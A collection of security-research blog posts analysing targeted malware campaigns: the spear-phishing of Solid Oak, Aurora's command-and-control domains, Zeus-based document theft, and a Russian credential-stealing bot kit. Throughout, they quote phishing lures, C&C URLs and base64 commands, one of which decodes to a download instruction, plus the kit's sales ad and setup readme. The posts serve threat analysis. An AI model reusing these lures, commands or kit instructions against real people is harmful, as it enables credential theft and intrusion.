Nart Villeneuve

A while back I posted an analysis of attacks on Solid Oak (the makers of CyberSitter) after a dispute with a Chinese firm that produced GreenDam over stolen code. Rob Lemos covered the story and also revealed that the law firm representing Solid Oak subsequently came under a similar targeted malware attack. The story has surfaced again, this time in connection with APT. I’ve reposted the original from malwarelab.org below.

Malware Attacks on Solid Oak After Dispute with Greendam

By Nart Villeneuve

After researchers discovered that portions of China’s Greendam filtering software were stolen from an American filtering company’s software, Cybersitter, the company that produces the software, Solid Oak, same under a targeted malware attack. This short post from the Malware Lab (www.malwarelab.org) analyzes two samples from the attacks.

Findings:

• The delivery component of the attacks specifically targeted Solid Oak. In one case the attackers registered and used a Gmail account that was a misspelling of of a Solid Oak employees name and used it to send an email about a contextually relevant topic.
• These targeted emails contained (or linked to) malicious files that, if opened, caused the targets computer to become infected with a Trojan Horse program.
• In both cases the Trojan connects to (related) web servers but requests seemingly legitimate files. However, at certain times the attackers insert HTML command tags into these files with commands.

Background

In June 2009, it was reported that the Chinese government was requiring the installation of filtering software, known as Green Dam, on all personal computers sold in China.¹ Researchers from the University of Michigan analyzed Green Dam and discovered security vulnerabilities that would allow malicious attackers to take control of any computer running Green Dam.

In addition, they found that portions of Green Dam’s block lists were taken from a U.S. Company, Solid Oak, that produces a filtering product called CyberSitter, and that the image filtering component was taken from OpenCV, an open source project.² Bryan Zhang, the founder of Jin Hui, the company that created Green Dam, denied that Green Dam contained stolen code and stated that it was “impossible”.³ Solid Oak released a report detailing the incident and is reportedly seeking legal action against PC manufacturers that are shipping computers with Green Dam installed.⁴

On June 25, 2009 reports emerged stating that Solid Oak was under attack. In addition to “server problems” company executives began receiving suspicious emails.⁵

The following is an analysis of samples of malware sent to Solid Oak.

Sample 1

On June 25, 2009 an email message was sent to Brian Milburn, the CEO of Solid Oak, from “jenna.dipaquale@gmail.com”; Jenna DiPasquale (note the missing “s”) is the head of public relations for Solid Oak.

Date: Thu, 25 Jun 2009 05:49:18 -0400
Subject: This is the Jinhui Computer System Engineering Inc’s report about China’s Green Dam Youth Escort screening software.
From: Jenna DiPaquale
To: bmilburn@solidoak.com

This is This is the Jinhui Computer System Engineering Inc’s report about
China’s Green Dam Youth Escort screening software.
www.civis.com/jinhui_report.zipabout China’s Green Dam Youth Escort
screening software.
www.civis.com/jinhui_report.zip

The file, jinhui_report.zip, was no longer available at www.civis.com at the time of analysis so sample that Solid Oak provided was used. The zip file contains an executable:

Jinhui_Computer_System_Engineering_Inc_the_Chinese_government_officials_report.exe

However, Windows computers have a “feature” enabled by default that hides file extension cause the malicious executable to appear as if it is a directory/folder.⁶

When the malicious file is run (the user thinks he or she is opening a directory), a directory with the same name is created and the contents of that directory (a Word document, Jinhuisays.doc) is displayed to the user while malicious software is dropped on the system. The malicious file issues a connect to http://www.chuckfaganco.com/docs/rmscpt5.htm (76.76.146.89) (See Threat Expert for an automated report.⁷)

The User-Agent contains some interesting characters:

GET /docs/rmscpt5.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32) z3?xwc.InfoPath.so
Host: www.chuckfaganco.com

The response contains a “command” in a HTML comment tag:

<!– {/*jgJ-.J} –>

This command has since been removed from the requested page.

After opening the malware, a document is displayed, Jinhuisays.doc, but it does not contain malware.⁸

Sample 2

The second sample is a Power Point file, “Solid Oak seteps up China’net nappy.ppt” that exploits a vulnerability in Power Point to drop a malicious file. (For automated reports see Threat Expert and Virus Total.) ⁹

The malware drops a file “Net110..exe” which issues a connection to http://www.parkerwood.com/help/403-3.htm. (69.20.4.85) (For an automated report see Threat Expert.)¹⁰

Unlike Sample 1, the User-Agent does not contain interesting characters:

GET /help/403-3.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: www.parkerwood.com

This command appears as a html comment in the response:

<!– czox –>

base64 decode = s:1

It eventually changed to:

<!– czozMDA= –>

base64 decode = s:300

Other commands seen on www.parkerwood.com by accessing a variety of other pages throughout the site, such as /help/403-1.htm, /help/403-2.htm, /help/403-4.htm, /help/403-7.htm.

<!– czo0 –>

base64 decode = s:4

<!– czoyNDA= –>

base64 decode = s:240

<!– ZDpodHRwOi8vd3d3LnBhcmtlcndvb2QuY29tL2ltYWdlcy90b3AuZ2lm –>

base64 decode = d:http://www.parkerwood.com/images/top.gif

<!– {/*jgJ-nJ} –>

After dropping the Trojan, a Power Point presentation opens.

One interesting behaviour of this particular case is that the page(s) that the malware connects to change quite frequently. At times, command are inserted into the page in HTML comment tags only to be completely removed at a later time, sometimes within several hours of first appearing. These commands also change over time. In addition, sometimes pages are no longer present (404) but re-appear at a later time. At other times, all the pages are restricted (403).

Sample 2 connected to http://www.parkerwood.com/help/403-3.htm every 10 minutes. These connections were monitored starting at Fri Jul 10 14:50:01 2009 and after finally receiving a command Sat Jul 11 22:20:47 2009 the malware did not issue any further connections (the monitoring stopped at Wed Jul 15 08:11:44 2009).

Fri Jul 10 14:50:01 2009 – 403 Forbidden No Command
Fri Jul 10 23:10:16 2009 – 404 Not Found No Command
Sat Jul 11 22:10:46 2009 – 403 Forbidden No Command
Sat Jul 11 22:20:47 2009 200 OK <!– czozMDA= –> (base64 decode = s:300)

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

[1] http://www.nytimes.com/2009/06/09/world/asia/09china.html
[2] http://www.cse.umich.edu/~jhalderm/pub/gd/
[3] http://online.wsj.com/article/SB124486910756712249.html
[4] http://www.cybersitter.com/gdcs.pdf and
http://www.pcworld.com/businesscenter/article/167842/suit_over_chinas_web_filter_to_target_lenovo_acer_sony.html
[5] http://government.zdnet.com/?p=5034, http://government.zdnet.com/?p=5049,
http://www.informationweek.com/story/showArticle.jhtml?articleID=218101882
[6] http://www.f-secure.com/weblog/archives/00001675.html
[7] http://threatexpert.com/report.aspx?md5=783c50f221c339f244ac68b38fcd30af
[8] http://www.virustotal.com/analisis/33e5495969fd497c439d18e7ea3976845c5454b378764a7b5dd887eef6bc8a9e-
1247083107
[9] http://www.threatexpert.com/report.aspx?md5=86f7cc8f65522a9d7eed8adf22bb9772 ,
http://www.virustotal.com/analisis/d1a5e159bfcdf3a22abf521d91bc83dd70ac3b1155c46eac5106450df17eb56b-
1247073429
[10] http://www.threatexpert.com/report.aspx?md5=1778671314196147402789eeb0c6d89c

The data about Aurora has always felt just a little off for me. Maybe its that everyone writing about it just has their own piece of the puzzle to analyse, without the detail required to accurately link the pieces together.

When it comes to the command and control infrastructure, maybe it’s that some obfuscated the domain names while others published them, but with a domain on the blog post that’s not in technical write up. Maybe it is that some have significantly bigger lists than others (that include duplicates as well as the root domain for a dynamic dns provider that hands out sub-domains).

Maybe it is that some name domains that hosted the exploit but do not provide details on C&C’s that compromised hosts check-in with. Maybe the difference between the long lists and short lists is that some are including “copycats” — sites that host the IE exploit. Since “Aurora” is now being used to refer to the specific attack on Google, the 0day vulnerability in Internet Explorer (that was apparently used), and the malware that was apparently dropped by the exploit (Hydraq) interchangeably it is difficult to get a handle on exactly what is what.

Google says the attacks were “highly sophisticated and targeted” (as does McAfee, Mandiant, and iDefense) while Damballa says that it was the work of amateurs, Dancho Danchev says that “[i]t’s in fact [an] average team” and Mikko Hypponen says “[t]his wasn’t in my opinion ground-breaking as an attack. We see this fairly regularly.” OK, well, that’s quite the continuum of “sophistication.” Back to that in a bit.

Attribution? The New York Times reported that the attacks were traced to two schools in China: Shanghai Jiaotong University and the Lanxiang Vocational School. While some have drawn links between these schools and the Chinese military others cast doubt on it. The Financial Times reportsthat “a freelance security consultant in his 30s” in China wrote (part of) the Internet Explorer exploit but “is not a full-time government worker, did not launch the attack, and in fact would prefer not be used in such offensive efforts.” Hmm. OK. Mandiant indicated that the quality of the exploit points toward some kind of relationship with the Chinese state, while iDefense, looking at the command and control infrastructure, pretty unambiguously states that the Chinese State was being the attacks whether or not “amateurs” were used.

So here we are at the crossroads of the exploit, the malware, and the command and control infrastructure. And as Richard Bejtlich points out there’s more to it than just the technical aspects of malware, there is, as Mike Cloppert describes, a range of indicators that allow one to characterize the adversary behind the attacks. Clearly, most of us relying on public sources do not have a sufficient level of detailed information to analyse the attack on Google with such depth.

This brings me back to the Damballa report. I really liked this report because is focused on the command and control infrastructure, it was based on interesting data collected via passive DNS data collection and included many interesting conclusion and enough detail to begin connecting their data with other publicly available data. In fact, one of the most interesting observations for me was evidence that the DNS resolutions indicate that Google China was compromised first, followed by Google in Mountain View some 17 hours later. Still, there are parts of the report that are confusing to me.

The Damballa report starts by looking at “five CnC domain names associated with the Aurora botnet” that were publicly disclosed, however, these domain names are not explicitly stated in the report. The most seemingly authoritative list, from Symantec, for example, lists 7 domains. The starting point appears to be “blog1.servebeer.com”. This one is common to all lists (except Symantec’s technical write-up). The domain servebeer.com is a Dymanic DNS serverice offered by No-IP that allows people to register sub-domains such as “blog1.” Based on factors such as “DDNS credentials” Damballa linked the following domains together (four of which are not disclosed).

CnC_Domain.1
CnC_Domain.2
CnC_Domain.3
CnC_Domain.4
blog1.servebeer.com

At some point each of the 5 domains above pointed at at least one of the “IP addresses associated with two of the CnC servers used during the Aurora attack.” The IP’s were not disclosed. Therefore, I am not entirely sure of how the next group of domain names are linked.

baltika1.servebeer.com
m7been.zapto.org
miecros.info
mcsmc.org
yahoo.blogdns.net
filoups.info
google.homeunix.com

While the last 2 domains (filoups.info and google.homeunix.com) appear on the US CERT list of “Aurora” domains, the first 5 domains (baltika1.servebeer.com, m7been.zapto.org, miecros.info, mcsmc.org, and yahoo.blogdns.net) do not.

Damballa then links this second group to “two distinct families of Fake AV Alert / Scareware: Login Software 2009 and Microsoft Antispyware Services.”

Fake AV Alert / Scareware
mcsmc.org
micronetsys.org
mnprfix.cn
filoups.info
miecros.info

Fake Microsoft Antispyware
ec2-79-125-21-42.eu-west-1.compute.amazonaws.com
ip-173-201-21-161.ip.secureserver.net
inekoncuba.inekon.co.cu
google.homeunix.com
yahoo.blogdns.net
voanews.ath.cx
ymail.ath.cx

So, filoups.info links the “Fake AV Alert / Scareware” to the US CERT list of “Aurora” domains and google.homeunix.com links the “Fake Microsoft Antispyware” to the US CERT list of “Aurora” domains. Both appear in Damballa’s second cluster (which has an unclear relationship with the first cluster).

Using the Damballa list along with samples from ThreatExpert I compiled a list that included a few additional domain names. I included domain names that the individual piece of malware requested that had similar paths to those identiofied by Damballa and excluded those that appeared to be other malware or SEO URLs.

For example, one sample contains google.homeunix.com, yahoo.blogdns.net, tyuqwer.blogdns.com, and tyuqwer.dyndns.org. The domains google.homeunix.com and tyuqwer.dyndns.org appear on the US CERT list, yahoo.blogdns.net appears on the Damballa list and tyuqwer.blogdns.com appears on neither. Another sample contains google.homeunix.com tyuqwer.dyndns.org blogspot.blogsite.org and voanews.ath.cx. All of these domains appear on the US CERT list google.homeunix.com and voanews.ath.cx appear on the Damballa list.

The next grouping largely focuses on “mcsmc.org” abnd the domain names that apear with it and request similar URL paths but are not in the Damballa report.

virtualmits.com
syswa.cn
thcway.info
searchnix.info
wscntgy.com
google-analitics.in
licagreem.in
jusched.in

The relationships between the domains can be built our further, especially if we include common IP addresses. I think this indicates that there are a variety of conclusion being drawn based on data that comes bundled with a variety of assumptions. For example, is the sample detailed by Symatec the same — as opposed to similar to — the one used in attack on Google? How were these “master” lists — such as the one by US CERT created? How were these domains bundled together?

In the Damballa report in particular there are a few additional assumptions that I am not entirely sure of. First, I’m not sure that DDNS == amateur. Many of the targeted attack on civil society and human rights groups I’ve looked at used DDNS. And while many DDNS providers do cooperate with the security industry and law enforcement, the ones in China (like 3322.org) don’t. Moreover, I’m not sure that “amateur” necessarily excludes state involvement — even governments can engage in behaviour that would be considered amateurish. And would you want to tip off state involvement by being uber3l33t? The logic just starts to become circular after a while, especially if you only focus on the technical aspects.

I mean, if we take Google at their word and believe that “a primary goal of the attackers was accessing the Gmail accounts of Chinese human rights activists” how do we explain the connection to (probably Eastern European) SEO and related common malware?

Even if we assume that the “master” list is accurate, Damballa does raise some alternative explanations for the association between the two:

• it is possible that two different groups purchased the services of the same crimeware group (probably the same people behind Operation Aurora) to distribute and manage their malware family. Or the crimeware group rented out different variants of the same malware to different groups with different intentions.
• There is no natural progression seen between the two families. Usually malware writers evolve in both technology and protection of their creation but these two families did not show any related evolution. The malware families appear to exist independently, and then become superseded by Trojan.Hydraq.

The relationship between crimeware — or common botnet operators/kits — and targeted malware attacks in order to extract sensitive data (some might call this espionage) is something I tried to explore in “The “Kneber” Botnet, Spear Phishing Attacks and Crimeware.” Again, given the lack of precise data I don’t claim to know what’s going on in the Google case — in fact, I may have just made it worse with this post. But if we accepts the links that Damballa has found to be accurate it does raise the important issue of the relationship between crimeware and espionage.

But, maybe, we’re jumping to conclusions based on faulty assumptions. I just don’t know. It is still a mess.

After I received an email from Jeff Carr warning about a spoofed email containing malware, I asked Jeff to send it along. It turns out that the attackers also used portions of a blog post by Brian Krebs as lure. What interesting is that the attack targeted .mil and .gov email addresses using text from Carr and Krebs about an earlier attack targeting .mil and .gov email addresses. A quick analysis of the sample indicated that it was Zeus and was beaconing to a known Zeus command and control server. However, the interesting part, for me, is what happened after getting compromised by Zeus, and I have to really thank Jeff for passing along the email because it led me to this stuff.

Around the same time news of the Kneber botnet broke and Netwitness linked the two attacks together. While much of the coverage of Kneber was hype-filled, the actual report by Netwitness is excellent and you can get a hype-free overview by Alex Cox, the guy who discovered it, here. The response of some of the AV vendors has been troubling. Essentially some said that this is nothing new, it’s just Zeus, and that there’s long been AV protection for Zeus. Netwitness responded stating that many AV’s actually did not detect the samples they analyzed.

The sample from the sample I analyzed the coverage was 18/41 on Virustotal.

The main issue for me was the use of Zeus to drop malware that focused on document removal and that it was used in conjunction with spear phishing attacks on .mil/gov email addresses. This second drop was 5/41 on Virustotal.

From the data it seems like the attackers were capturing whatever they could, not retrieving specific documents. That said, they managed to compromise the types of people they appeared to be after (in terms of who the phishing mails were sent to) and in a few cases managed to get some very interesting documents.

I think the broader issue is what Brian Krebs alluded to in the comments section of his blog – and Netwitness indicated this as well — that is if we believe that these crimeware types are squeezing all the monetary value they can out of their operations, what would they do with the type of information that has intelligence value but is not easily monetized in a traditional sense? And how better to obscure attribution that to use existing crimeware infrastructure for what appears to be more espionage that traditional crime?

I am keeping these as open questions because I am not sure how strong the connection is and tend to be cautious on these issues. But I do think it is an interesting case.

Read the full post here and here.

UPDATE: I’ve copied the report into this post.
More… »

There have been many articles saying that Google is pulling out China. Well, that’s not exactly what Google said.

Here is exactly what Google stated:

We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all. We recognize that this may well mean having to shut down Google.cn, and potentially our offices in China.

Google is not leaving China. At least not yet.

Look at what was actually said:

1) Google is not willing want to censor, so Google will 2) engage in discussion with the Chinese government and, 3) in order to operate an uncensored search engine within the law.

Law is the key word here. China’s Foreign Ministry spokesperson, Jiang Wu, stated:

China welcomes international Internet companies to conduct business within the country according to law

The question is, what law says that Google cannot index the web site of the BBC news? Anyone know?

In 2006 when Google started censoring google.cn in China I asked:

What specific law or court order is being complied with in China?

It is 2010, still no answer.

I think it is a reasonable question for Google to ask.

This post is my analysis of publicly information available on the attack against Google. I think that Google linked to my blog and the GhostNet report because of similarities in methods, not because the two cases are linked. This post combines my analysis of Google’s statement, media report and my experience with other attacks — that doesn’t mean that this is exactly what happened in the attack on Google.

There’s been a lot of chatter about how Google and 30+ other companies were compromised. Adobe has issued a statement saying that they too were compromised they still won’t say if attacks are in fact linked. Yahoo! stated that they were “aligned with Google” and it is now being reported that Yahoo! was among the other unnamed victims in the attack.

The timing of the compromise is interesting because it coincides with a 0day vulnerability in Adobe Reader. It has been suggested that this was the attack vector. The coincidence is interesting and I think that this claim is fairly credible.

UPDATE: McAfee reports that the compromise was an Internet Explorer 0day:

Our investigation has shown that Internet Explorer is vulnerable on all of Microsoft’s most recent operating system releases, including Windows 7. Still, so far the attacks we’ve seen using this vector have been focused on Internet Explorer 6. Microsoft has been working with us on this matter and we thank them for their collaboration.

While we have identified the Internet Explorer vulnerability as one of the vectors of attack in this incident, many of these targeted attacks often involve a cocktail of zero-day vulnerabilities combined with sophisticated social engineering scenarios. So there very well may be other attack vectors that are not known to us at this time. That said, contrary to some reports our findings to date have not shown a vulnerability in Adobe Reader being a factor in these attacks.

iDefense has stated that they were able to investigate these attack since some of their customers were also hit:

IDefense was called in to help some of the victim companies that Google had uncovered. According to Jellenc, the hackers sent targeted e-mail messages to victims that contained a malicious attachment containing what’s known as a zero-day attack. These attacks are typically not detected by antivirus vendors because they exploit a previously unknown software bug.

“There is an attack exploiting a zero-day vulnerability in one of the major document types,” Jellenc said. “They infect whichever users they can, and leverage any contact information or any access information on the victim’s computer to misrepresent themselves as that victim.” The goal is to “infect someone with administrative access to the systems that hold the intellectual property that they’re trying to obtain,” he added.

The attack vector is very similar to GhostNet, but, it is a very common form of attack. Mikko Hypponen (who is awesome) told the BBC:

“This wasn’t in my opinion ground-breaking as an attack. We see this fairly regularly. said Mikko Hypponen, of security firm F-Secure.

“Most companies just never go public,” he added.

“Human-rights activists are the biggest target,” said Mr Hypponen. “Everyone from Freedom for Tibet to Falun Gong supporters and those involved in Liberation of Taiwan are hit.”

I tend to agree. It is not the method of attack that is the story here, its the high profile of the victims and public disclosure by Google as well as Google decision to challenge China’s censorship that have made it so interesting. Really, we investigate these kind of attacks (usually on human rights activists) all the time.

In short, a user receives an email, possibly appearing to be from someone that they know who is a real person within his/her organization, with some text — sometimes specific, sometimes generic — that urges the user to open an attachment (or visit a web site) usually a PDF or Word Document (but other document types are also common). If the user open that attachment with a vulnerable version of Adobe Reader or Microsoft Office their computer will be compromised. The antivirus detection for these documents is usually relatively low and if the exploit is a 0day — an exploit for which there is no fox form the vendor available — the chances of compromise are very good.

After the user’s computer is compromised it “checks in” with a command and control server (C&C). These days it is most common for this check in to be an HTTP connection — it often looks like just another visit to a website — in which the compromised computer sends some information, usually an IP address and operating system etc… — and receives a command which it then executes. From there the attacker has full control of the system. The attacker can steal documents, email etc… force the compromised computer to download additional malware and use your infected computer as a mechanism to exploit your contacts or other computers on your network.

One of the things I like to track closely is the network infrastructure of the attackers — the location of their command and control servers as well as the mechanism of communication and other properties of the malware that allows for seemingly disparate attacks to be linked together. There has been some information published about the command and control servers used in the Google attack. James Mulvenon, who really knows his stuff, stated that the C&C’s were in Taiwan, the drop site for stolen stuff was on a US IP:

The attacks appear to have been launched from at least six Internet addresses located in Taiwan, which is a common strategy used by Chinese hackers to mask their origin, said James Mulvenon, director of the Center for Intelligence Research and Analysis at Defense Group Inc. a national-security firm.

They also hijacked the Internet address of a San Antonio-based firm, Rackspace, which is one of the largest Internet-hosting companies in the U.S. They siphoned off the stolen data from Google and other companies to the San Antonio site before sending it overseas, Mr. Mulvenon said. A Rackspace official said, “A server at Rackspace was compromised, disabled, and we actively assisted in the investigation of the cyber attack, fully cooperating with all affected parties.”

In addition, a dynamic DNS service was reportedly used:

iDefense obtained samples of the malicious code used in the July attack and the more recent one and found that although the malware was different in the two attacks, the programs both communicated with similar command-and-control servers. The servers each used the HomeLinux DynamicDNS to change their IP address, and both currently pointed to IP addresses belonging to a subset of addresses owned by Linode, a US-based company that offers Virtual Private Server hosting.

“The IP addresses in question are . . . six IP addresses apart from each other,” iDefense said in its statement. “Considering this proximity, it is possible that the two attacks are one and the same, and that the organizations targeted in the [recent] Silicon Valley attacks have been compromised since July.”

UPDATE: Apparently one of the pieces of malware used was the Hydraq Trojan.

And what did the attackers steal? Google stated that there was “theft of intellectual property”, some suggest that the attackers stole source code:

But according to iDefense, whose customers include some of the 33 companies that were hacked, the attacks were well targeted and “unusually sophisticated” and aimed at grabbing source code from several hi-tech companies based in Silicon Valley as well as financial institutions and defense contractors.

However, Google stated that the”primary goal of the attackers was accessing the Gmail accounts of Chinese human rights activists” and that the attack was partially successful:

Only two Gmail accounts appear to have been accessed, and that activity was limited to account information (such as the date the account was created) and subject line, rather than the content of emails themselves.

Others state that Google’s internal intercept systems were attacked:

That’s because they apparently were able to access a system used to help Google comply with search warrants by providing data on Google users, said a source familiar with the situation, who spoke on condition of anonymity because he was not authorized to speak with the press. “Right before Christmas, it was, ‘Holy s***, this malware is accessing the internal intercept [systems],’” he said.

Now some people have come forward, a Tibetan activist for example, saying that their email accounts had been breached.

Who is behind the attacks? Google didn’t really say who was behind the attacks . iDefense, who may be overreaching here, stated that it was the “Chinese state”:

“We confirmed with some clients and partners of ours in the defense contracting community that the IP addresses used to launch the attacks are known to be associated with previous attacks from groups that are either directly employed agents of the Chinese state or amateur hackers that are proxies for them that have attacked other U.S. companies in the past.”

In fact, attribution in these sorts of attacks is very difficult. Often people rely on the geolocation of an IP address — that’s not good enough. In these case the C&C’s were apparently in Taiwan and the drop site in the US. What does that tell us? Through piecing together seemingly disparate bits of information over time it is possible to make an educated guess. What makes the process difficult and tenuous is that the attackers might be quite different persons from those to ultimately exploit the data the attackers gather. It is the interpretation of the political dimensions of the attack that lead to a determination of who might ultimately have benefited the most form the attack, not technical evidence. Therefore there is room for a lot of uncertainty.

Google has just announced that there were successful attacks against their infrastructure resulting in the theft of intellectual property. Google traced the attacks to China and although the attribution regarding the Chinese government is unclear, Google also discovered that the attackers also attempted to compromise the Gmail accounts of Chinese human rights activists.

But the most interesting result was due to the combination of attacks, surveillance and censorship Google has decided to reassess their operations in China:

These attacks and the surveillance they have uncovered–combined with the attempts over the past year to further limit free speech on the web–have led us to conclude that we should review the feasibility of our business operations in China. We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all. We recognize that this may well mean having to shut down Google.cn, and potentially our offices in China.

The decision to review our business operations in China has been incredibly hard, and we know that it will have potentially far-reaching consequences. We want to make clear that this move was driven by our executives in the United States, without the knowledge or involvement of our employees in China who have worked incredibly hard to make Google.cn the success it is today. We are committed to working responsibly to resolve the very difficult issues raised.

Wow.

The connection between censorship, surveillance and attacks is the key. Censorship, such as the blocking of web sites, is fairly crude but effective when combined with targeted surveillance and attacks. While many, especially the technically savvy, can circumvent China’s filtering system, the “GFW”, using tools such as Psiphon and Tor most Chinese citizens do not. The GFW doesn’t have to be 100% technically effective, it just has to serve as a reminder to those in China about what content is acceptable and that which should be avoided. The objective is to influence behaviour toward self-censorship, so that most will not actively seek out banned information of the means to bypass controls and access it.

The nexus of censorship, surveillance and malware attacks allows China is the key to China’s information control policies. It is not just about the GFW. Internet users in China face complex threats that are heavily dependent on additional factors, such as involvement in political activities, that involve targeted attacks and surveillance. China chooses when, where and how to exercise this granular control.

The InfoWar Monitor — which is a partnership between the Citizen Lab, Munk Centre for International Studies, University of Toronto and The SecDev Group (and SecDev.cyber which focuses on Internet threats) — has been focusing on these threats. For example, in a report “Breaching Trust: An analysis of surveillance and security practices on China’s TOM-Skype platform” we documented how Tom-Skype (the Chinese version of Skype) was censoring and capturing politically sensitive content. In “Tracking GhostNet: Investigating a Cyber Espionage Network” we documented targeted malware attacks that compromised over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs.

Google’s decision to re-asses their operations in China is courageous. I strongly hope that Microsoft, Yahoo! and others follow Google’s lead — as, to their credit, they have done in the past. In “Search Monitor Project: Toward a Measure of Transparency” I compared the censorship practices of Google, Yahoo! and Microsoft as well as the domestic Chinese search engine Baidu and found that all followed Google’s lead to some extent by at least disclosing their censorship practices to their users. I hope that they stand by Google.

China, the ball is in your court.

It’s no surprise that there is a malware market, an ecosystem of buyers, sellers and middlemen known as “guarantors”. In a very interesting post, “The botnet ecosystem“, Vitaly Kamluk explains the way in which this system works. There is a malware market in which malicious code and services are exchanged with the help of trusted third parties — usually administrators of popular forums. In addition, compromised hosts and stolen credentials are also exchanged.

Here’s a microcosm of this ecosystem that I stumbled upon recently. A member of a forum (forum.inattack.ru) called “Brainy” posts an add for a bot system that steals FTP and HTTPS credentials:

Here’s the Google translate version of a post by “brainy”:

[brainyframer], bot freymer \ Gruber \ sniffer
20.11.2009, 2:06

I offer you a bot freymer / sniffer / Graber my production [BrainyFramer]
This bot will be a good assistant to many who are professionally engaged cores.

Functional:
Graber-21 FTP client
FTP-sniffer with 37 different clients (web browsers including)
-HTTPS formgraber for IE (5,6,7,8) and FF. For snifa panel hosting (~ 120 different hosts)
-Freymer Semiconductors, distributed processing your list of FTP bots. High speed. Frame akov from the bot after snifa. Removal of foreign code.

Admin at work:
Screen

Progruzheno loader for 100 cars
Article: How to see otstuk 75%
Palimost build in test 4 AB.

____________________________

Price build: 400vmz
____________________________

[!] Everyone who bought a free upgrade.
[!] Change link for free.
[!] Questions, setting free too (IMG: http://html.forum.web-hack.ru/emoticons/smile.gif)
[!] Soft palitsya. I do not crypt. I give the contact person who does it.
[!] On Vista and windows 7 is not working.
————————————————– ———–

Answers to frequently asked questions:
——
Question: What palitsya. Traverses a firewall?
A: Soft works in the context of web browsers and FTP client system. If these applications have access to the network, the bot will work.
—–
Q: Why do little in the FTP log
Answer: It depends on your downloads. With 1K purchased downloads usually goes akkov 20-100. 0.5-1K Semiconductors with 1K of purchased downloads is a myth.
If you download from the dor. traffic Kay “download ftp client” then you understand that the FTS in the log will be more.
—–
Q: What about an exchange for …?
Answer: No, I do not need anything except money.
—–
Question: Is it possible to test?
Answer: I have no desire and time to make someone test. Soft checked in not only me alone.
—–

Asya> 3_5266891_7

A forum administrator vouches for brainy, acting as the trsuted middleman or “guarantor”. Here’s the Google translate version:

Take this software is already long enough. All the alleged author of the software options – do. The author – an appropriate person with whom pleasant girl. Update issued on a regular basis. In general – I recommend.

On a server hosting some other nasty stuff including the Liberty exploit kit I found Brainy’s kit:

IP: 210.51.166.220

Domains:

bale.ws
ciao.ws
prefix.ws
hzone666.cn

Here is the readme file that comes with the bot:

Скрипты для [BrainyFramer]

0. conf.php – Настройки базы и рабочих линков
1. create.php – Создает таблицу
3. get.php – Дает боту настройки.
4. check.php – Админка
5. list.txt – Список фтп
6. \logs\ftp.log – Лог c фтп (права 755)
7. \logs\https.log – Лог c https (права 755)
8. grab.dll – Модуль грабера, не трогать!

Как установить эти скрипты?
——————————–
-Делаем настройку папки, чтобы поисковые боты не бегали по нашим файлам)
-Создаем базу данных для них, пишем настройки базы , также задаем логин и пасс на админку.
-Запускаем create.php, если все Ок с настройками , то будет надпись “Таблицы созданы”
-Загружаем список фтп акков (список должен быть в простом текст. формате) на сервер в папку с скриптами, имя файла со списком (поумолчанию list.txt) пишем в conf.php
——————————–

(с) Brainy 352668917

Google translate:

Scripts for [BrainyFramer]

0. conf.php – Base settings and working links
1. create.php – Creates a table
3. get.php – Gives the bot settings.
4. check.php – Admin
5. list.txt – List of Semiconductors
6. \ logs \ ftp.log – log c Semiconductors (Law 755)
7. \ logs \ https.log – log c https (Law 755)
8. grab.dll – Module Graber, do not touch!

How to install these scripts?
——————————–
-Makes setting up a folder to search bots did not run on our files)
-Creating a database for them, write the base configuration, is also asking login and pass on the admin panel.
Run-create.php, if everything is OK with the settings, it will be marked “Table created”
-Load the list of FTP akkov (list must be in plain text. Format) on the server in the folder with the script, the file name from the list (poumolchaniyu list.txt) write in conf.php
——————————–

(c) Brainy 352668917

Today the list.txt (which contains compromised FTP accounts) has 528 entries. this list has varied over time at one time swelling to 100,000 entries, although many were duplicates. Also, many accounts were taken from public postings of compromised FTP accounts. (Nov 1 – 23632 list.txt, Nov 15 – 100000 list.txt).

The ftp.log file, which are FTP credentials that this instance of the BrainyFramer kit has captured contains 1684 entries. Many are local accounts, anonymous accounts and so on. The 528 entries in list.txt appear to be a cleaned up version of the entries in ftp.log.

The most interesting file is https.log which contains credentials captured from HTTPS sessions. This file is 2.8 MB and contains credentials captured from 2059 unique IP addresses.

Credentials were captured for users with accounts on 125 sites:

ac-s8.mcafee-sms.com
adklik-adpartner.mynet.com
app.expressemailmarketing.com
applin0.hostedsitebuilder.com
apps.rackspace.com
appserver.5paisa.com
auth.mail.ru
billing.hostley.net
billing.justhost.com
bne003wm.server-secure.com
bolton.eukhost.com
cart.godaddy.com
club.panasonic.jp
dc-au.server-secure.com
domains.live.com
ea.onlineregister.com
echosting.cafe24.com
email.1and1.com
email.secureserver.net
email05.secureserver.net
firstfreedom.securepagehost.com
gator340.hostgator.com
gen.gmarket.co.kr
host1.medcohealth.com
host136.aessuccess.org
hotsms.www.hi.nl
htdatabase.fluidhosting.com
idp.godaddy.com
in.adserver.yahoo.com
intranic.nic.in
irenerobles.readyhosting.com
login.1und1.de
login.bluehost.com
login.hosted-commerce.net
login.mcafee-sms.com
mail.bsf.nic.in
mail.nextpharma.com.tr
mail.nic.in
mailhost.hrhgeology.com
mailserver2.security-forces.com
market.egitimonline.com
market.mynet.com
market.sealonline.co.kr
netac80.vie.hosting.nokia.com
onlinedoctor.lloydspharmacy.com
p2.secure.hostingprod.com
partner.allianz.hu
passport.yandex.ru
portal.bsh-partner.com
rbserver.achievacu.com
rdserver.rd.go.th
register.btinternet.com
register.dailymail.co.uk
register.facebook.com
register.go.com
register.hp.com
register.metro.co.uk
register.outspark.com
register.perfectworld.com
register.remedylife.com
register.scansoft.com
registration.lycos.com
rni.nic.in
secure.domain.com
secure.hostelbookers.com
secure.odlmarkets.com
secure.server101.com
secure.turhost.com
secure.turkishost.com
secure01.bankhost.com
server.iad.liveperson.net
server.lon.liveperson.net
server.ylos.com
server10.dollarsonthenet.net
server11.dollarsonthenet.net
server12.dollarsonthenet.net
server7.dollarsonthenet.net
